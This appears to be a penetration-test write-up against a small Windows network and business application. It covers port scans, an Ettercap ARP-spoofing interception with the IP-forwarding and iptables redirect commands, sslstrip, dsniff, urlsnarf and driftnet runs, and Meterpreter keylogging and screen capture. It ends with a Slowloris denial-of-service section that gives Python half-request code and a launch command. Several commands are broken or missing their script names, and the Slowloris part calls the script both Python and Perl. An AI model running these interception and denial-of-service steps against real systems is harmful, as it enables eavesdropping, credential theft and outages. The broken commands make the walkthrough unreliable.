    The first test was a scan of services and ports on the Microsoft devices, using Nessus port scanning as well as the Microsoft Baseline Security Analyzer. The test discovered the default Windows system ports open: unsigned SMB, telnet, and high ports. Nessus showed an unsigned SMB/Samba port (445) open as well as the clear text telnet channel (23), and reported only one medium and one low alert for the server. On the workstation, port 135 was found open, used for remote procedure calls. Port 139 was open, used with SMB for file sharing with devices besides Microsoft's. Port 808 is the Streetsmarts web-based application running encrypted, and port 992 was found to be an SSL port with a certificate error. Additional open ports ranged from 49152-49157; a Microsoft change from January 2008 starts the dynamic port range at 49152, and some P2P (peer-to-peer) file sharing has been known to run over these ports.
    A possible attack that was not conducted in this test was escalation of privileges via the SMB vulnerability, combined with brute forcing usernames and passwords. An attacker could also have social engineered the credentials out of an unsuspecting user; there is a real probability of that happening.

    Armitage has an option to ask it what vulnerabilities and attacks might be possible on the chosen target. Just select the host and go to the menu Attacks > Find Attacks. It returns a list of possible attacks and says "Happy Hunting!" So that is exactly what we did.

    The following tools were used to test for the vulnerability of unencrypted communication on the LAN (Local Area Network), with Ettercap always providing the MITM: SSLstrip, Dsniff, Driftnet, Urlsnarf, and Meterpreter.

    Technical Overview – Sniffing MITM Attacks
    Using Ettercap, we copied traffic between the user and the gateway to our pen-testing laptop. We ran Ettercap together with sslstrip, urlsnarf, dsniff, and Driftnet in an attempt to see the traffic, entering the commands shown below. In Ettercap we scanned the subnet and added target 1 = the gateway and target 2 = the victim machine. With that in place, we were able to get a copy of everything the user sent, delivered to the laptop (the attacker) first before going on to the real gateway. This is done with sslstrip, iptables, and Ettercap running a MITM ARP-spoofing attack. In a test where you are trying to conceal what you are doing from detection, it is very important to ensure your laptop can handle the traffic, and you must be ready to execute the sequence of commands in order, or you may see packets destined for the same IP address twice.

    Each attack and tool used has its benefits and limitations. The scenario was corporate espionage: see what data goes across the wire and sell it to a competitor for money. The tools below were researched and chosen for this pen test to find out what would really come across. The following is a brief overview of each tool.

    SSLstrip – A tool that quietly prevents a connection from upgrading to an SSL session. The history behind it is that one could also forge a certificate that appeared signed and trusted, so that a session looked like legitimate HTTPS with the intended server while actually terminating at the attacker (Wikipedia).

    Dsniff – A tool used to sniff anything of interest, like email or passwords. ARP spoofing has to be running, of course, so that traffic is routed through the attacker's PC and back out to the real router and PC (Wikipedia).

    Driftnet – This tool lets you see what images cross the user's browser while surfing the web. In this test, users were not on the internet, but they used a browser to launch the application we wanted to watch.

    Urlsnarf – A tool that writes all visited URLs to a file for easy review. Not a tool that provided much advantage in this pen test.

    Meterpreter – A payload that can take advantage of many vulnerabilities on different platforms in order to gain root access to or control of a PC.
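    The core trick SSLstrip relies on, rewriting links in intercepted pages so the victim's browser never asks for HTTPS in the first place, can be sketched in a single line of Python. The real tool does much more than this one replacement: it proxies the stripped sessions over SSL itself, tracks cookies, and can swap in a lock favicon.

```python
def strip_https_links(html: bytes) -> bytes:
    """Downgrade every https:// link in an intercepted page to http://.

    Sketch of sslstrip's rewriting step only; the real tool then fetches
    the original https URL itself and relays the response in clear text.
    """
    return html.replace(b"https://", b"http://")
```

    Fed a page containing a link like https://example.com/login, the victim gets back http://example.com/login and submits credentials in the clear while the attacker speaks SSL to the real server.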

    Script Execution
    In the following presentation of code we see the numerous attempts, using Ettercap and ARP spoofing, to send traffic to the attacker. Each tool was run alongside Ettercap to see what information would actually reach the attacker. The most exciting tools were Driftnet and Meterpreter, because of what could be seen and the control they gave.

    ettercap --mitm ARP:REMOTE --text --quiet --write /root/sslstrip/ettercap.log --iface eth0
    The GUI was also used to pick the Windows 7 client machine as the first target and the application server as the second.

    Execute the following commands
    In the CLI we entered:
    root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@bt:/# cat /proc/sys/net/ipv4/ip_forward
    root@bt:# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    Now verify it took the filter
    root@bt:~# iptables -L -t nat
    Chain PREROUTING (policy ACCEPT)
    target prot opt source destination
    REDIRECT tcp -- anywhere anywhere tcp dpt:www redir ports 10000
    Chain INPUT (policy ACCEPT)
    target prot opt source destination
    Chain OUTPUT (policy ACCEPT)
    target prot opt source destination
    Chain POSTROUTING (policy ACCEPT)
    target prot opt source destination
    root@bt:# sudo python -l 1000 -f lock.ico

    Results sslstrip: No data or text of any sort was visible, since all data was being passed through an encrypted channel.

    Results with dsniff: Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

    Results with driftnet: There were no pictures or images of the site going across. There were web addresses being listed.

    Results with urlsnarf: The only thing that came through here was some local address space and some internet address space redacted for publication. Still there were no real gems of information for quick gains.

    Technical Output
    root@bt:~# urlsnarf -n -i eth0
    urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
    - - [15/Jan/2013:23:10:12 -0500] "GET HTTP/1.1" - - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
    - - [15/Jan/2013:23:10:13 -0500] "GET
    - - [15/Jan/2013:23:11:17 -0500] "GET HTTP/1.1" - - "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
    - - [15/Jan/2013:23:11:17 -0500] "GET HTTP/1.1" - - "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
    - - [15/Jan/2013:23:11:17 -0500] "GET HTTP/1.1" - - "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
    - - [15/Jan/2013:23:11:17 -0500] "GET HTTP/1.1" - - "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
    - - [15/Jan/2013:23:11:17 -0500] "GET HTTP/1.1" - - "" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
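    Since urlsnarf writes CLF-style log lines, reviewing a large capture is easy to script. A rough Python sketch that pulls the timestamp, request, and user-agent out of each line (the client-host fields in the capture above were redacted, so they are ignored here):

```python
import re

# CLF-style pattern for urlsnarf lines: bracketed timestamp, quoted
# request line, then the user-agent as the last quoted field.
CLF_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<request>[^"]*)".*"(?P<agent>[^"]*)"\s*$'
)

def parse_urlsnarf_line(line):
    """Return timestamp, request, and user-agent from one log line, or None."""
    m = CLF_RE.search(line)
    return m.groupdict() if m else None
```

    From there it is one list comprehension to filter a capture down to, say, only the POST requests or only a particular user-agent.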

    Executed commands (example):
    root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@bt:/# cat /proc/sys/net/ipv4/ip_forward
    1

    In another terminal, we used Driftnet
    root@bt:/# driftnet -i eth0
    root@bt:/# driftnet -i eth0 -v -s (in an attempt to capture streamed audio)
    We could then see what the user was looking at for images.

    Results: Images from core business application were not being sent to our laptop despite driftnet running
    root@bt:~# driftnet -i eth0 -v
    driftnet: using temporary file directory /tmp/driftnet-AmaowM
    driftnet: listening on eth0 in promiscuous mode
    driftnet: using filter expression `tcp’
    driftnet: started display child, pid 2562
    driftnet: link-level header length is 14 bytes
    .driftnet: new connection: ->
    …driftnet: new connection: ->
    …driftnet: new connection: ->
    …driftnet: new connection: ->

    Meterpreter – Used with Armitage, a Meterpreter connection was the approach in this test, since the encrypted channel made it impossible to glean any data or leak it out by sniffing alone. Knowing the administrator password made the connection possible. Even a regular user with a known password would be able to dump the hash database, pass the hash, and crack passwords later in an attempt to escalate privileges. Time is the deciding factor in how successful a cracker will be when going slow at password cracking.

    Results: We were able to log keystrokes and take screenshots of the user's computer, which is one way data could be captured. In this test we show that key logging and screen captures are possible; however, they are not very effective, as shown below in Image 7. Anything operating at the application layer of the OSI model remained visible and the tool worked; once traffic was encrypted at the network layer, it was impossible to see.

    Image 4 – Armitage Text Output of Key logging


    Image 5 – Email Credentials Entered

    Image 6 Screenshot Before Launching Encrypted Application


    Image 7 – After Launching Encrypted Application

    We have already seen that the desktop can be captured with screenshots and information leaked that way. Notice in the image below, however, that the application icon is present as a big 'S' in the toolbar, and on the workstation the application is in the foreground; yet in the captured image it is not seen, and is therefore encrypted to the reverse TCP shell. That 'S' represents the business's core application. The launch HTML page, served on port 80, is the only visible part of the application. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

    DoS – Slowloris Python Script

    Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable to them for this test. Remember that an unavailable system means lost income, an impact serious enough to make generating income and staying operational difficult. The script we will use is a Perl script called slowloris (there is a version for IPv6 as well). It is unique in that it does not try to hammer the web server right away with a full load of requests; it comes in waves. The script has settings for the number of connections and the frequency of those connections, and those two fields were used against the server. The server was a Windows Server 2008 R2 (fresh install, no updates).

    Starting the script, once you have downloaded it to your pen test PC, is straightforward. As with any test, you start with what is supposed to work, then review the results and make changes. The changes we made were simple: each time slowloris runs, it makes a whole bunch of half requests to the web server. The requests never get finished, and the web server just sits there with a session consumed, waiting for the user to resume communication. This weakness is known for some Apache servers but not for IIS 7.0; at the time of this test the outcome was unknown, but we thought it would be fun to try. Also check that you have Perl installed (perl -v); most Linux instances do.
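    The half-request behavior described above is easy to picture in code. Here is a stdlib Python sketch of the idea, for use only against systems you are authorized to test; the real slowloris script adds the connection count, per-connection timers, and the HTTPS option on top of this:

```python
import socket
import time

def open_half_request(host, port, timeout=10):
    """Open a connection and send an HTTP request that is never completed.

    The header block is never terminated with the blank line, so a
    vulnerable server keeps a worker busy waiting for the rest.
    """
    sock = socket.create_connection((host, port), timeout=timeout)
    sock.sendall(b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n")
    return sock

def keep_alive(sock):
    """Trickle one bogus header line so the connection never idles out."""
    sock.sendall(b"X-a: " + str(int(time.time())).encode() + b"\r\n")
```

    Run in a loop over hundreds or thousands of sockets, with keep_alive called on each just before the server's timeout, this is the wave pattern slowloris produces.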

    We modified the script to change the number of connections, then lowered the timeout period for waiting to start each new connection. As the script ran, the CPU on the server would spike to 78% and then 100%, then drop again as the script entered its wait interval. Then it would run again, with similar results on the CPU. As far as hacking goes, if you do not get the results you want, just keep trying. So we stopped the script, changed connections per second to the maximum it would take, 10,000 per second, and tested again. After the second run, the Server 2008 R2 box would take a hit but continue to serve out the web page. Unfortunately for the pen tester, there was no break in service; fortunately for the company running the software, they stayed operational. As a side note, for a non-Linux tool we used the Low Orbit Ion Cannon on the server multiple times in addition to slowloris, and still the web site was up.

    The following command will result in the same activity we tested earlier in 2013: ./ -dns -port 443 -timeout 30 -num 10000 --https

    In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or as part of a package like Armitage in Kali or Ubuntu, and of course the Metasploit framework. This gives penetration testers the tools they need to test vulnerabilities by trying exploits with different payloads. Some Windows-based tools have gained notoriety, but Linux is still the preferred platform. What is great about Linux and the open source community is the number of people contributing to its success, and that is something that will carry the distributions forward as time and technology change.

    Just the right info to keep yourself safe!